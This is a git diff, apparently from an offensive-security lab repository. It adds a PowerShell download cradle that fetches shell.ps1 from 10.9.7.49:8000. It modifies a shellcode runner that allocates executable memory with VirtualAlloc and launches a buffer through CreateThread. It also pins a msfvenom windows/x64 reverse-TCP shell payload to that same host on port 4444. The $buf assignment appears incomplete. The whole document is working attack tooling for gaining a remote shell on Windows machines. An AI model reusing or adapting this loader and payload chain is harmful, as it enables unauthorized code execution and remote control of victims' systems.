diff --git a/8/download.ps1 b/8/download.ps1 new file mode 100644 index 0000000..0d820bb --- /dev/null +++ b/8/download.ps1 @@ -0,0 +1 @@ +(New-Object System.Net.WebClient).DownloadData('http://10.9.7.49:8000/shell.ps1') diff --git a/8/shell.ps1 b/8/shell.ps1 index ce83413..ae2ea65 100644 --- a/8/shell.ps1 +++ b/8/shell.ps1 @@ -1,40 +1,31 @@ -$Buf = +[Byte[]] $buf = $VrtAlloc = @" using System; using System.Runtime.InteropServices; - public class VrtAlloc{ [DllImport("kernel32")] - public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); + public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); } "@ - Add-Type $VrtAlloc - $WaitFor= @" using System; using System.Runtime.InteropServices; - public class WaitFor{ [DllImport("kernel32.dll", SetLastError=true)] - public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); + public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } "@ - Add-Type $WaitFor - $CrtThread= @" using System; using System.Runtime.InteropServices; - public class CrtThread{ - [DllImport("kernel32", CharSet=CharSet.Ansi)] - public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); - +[DllImport("kernel32", CharSet=CharSet.Ansi)] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); } "@ -Add-Type $CrtThread - +Add-Type $CrtThread [IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40) [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length) $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0) diff --git a/8/venom.sh b/8/venom.sh index 655354e..1cfc910 100755 --- a/8/venom.sh +++ b/8/venom.sh @@ -1 +1 @@ -msfvenom -p windows/x64/shell_reverse_tcp LHOST="$1" LPORT=1337 -f powershell +msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.7.49 LPORT=4444 -f powershell